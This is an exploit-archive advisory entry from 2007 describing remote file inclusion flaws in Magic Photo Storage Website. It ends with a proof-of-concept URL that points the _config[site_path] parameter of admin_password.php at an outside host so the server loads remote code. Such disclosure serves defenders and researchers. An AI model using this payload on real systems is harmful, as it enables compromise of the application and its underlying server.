Magic Photo Storage Website - adminadmin_password.php?_config[site_path] Remote File Inclusion

2007-01-09T00:00:00
ID EXPLOITPACK:C176F364DBE2C5407D6BEC5E59391147
Type exploitpack
Reporter IbnuSina
Modified 2007-01-09T00:00:00

Description

Magic Photo Storage Website - adminadmin_password.php?_config[site_path] Remote File Inclusion

                                        
                                            source: https://www.securityfocus.com/bid/21965/info

Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

http://www.example.com/path/admin/admin_password.php?_config[site_path]=http://www.example2.com